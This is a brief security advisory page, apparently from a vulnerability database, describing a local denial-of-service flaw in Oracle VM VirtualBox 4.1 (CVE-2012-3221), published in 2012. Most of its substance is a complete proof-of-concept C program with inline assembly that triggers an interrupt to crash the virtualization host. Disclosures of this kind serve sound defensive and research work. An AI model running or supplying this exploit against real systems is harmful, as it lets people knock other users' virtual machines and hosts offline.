|
|
| |
| Oracle VM VirtualBox is prone to a local denial-of-service vulnerability. |
| |
Credit:
The information has been provided by Lorenzo Cantoni.
|
| |
Vulnerable Systems:
* Oracle VM VirtualBox 4.1
Attackers can exploit this issue to cause denial-of-service conditions.
int main(int argc, char **argv) {
asm (
"int $0x8;"
: // output: none
: // input: none
:"%eax", "%ebx", "%ecx", "%edx" // clobbered register
);
return(0);
}
CVE Information:
2012-3221
Disclosure Timeline:
Published: 2012-09-10
|
|
blog comments powered by
|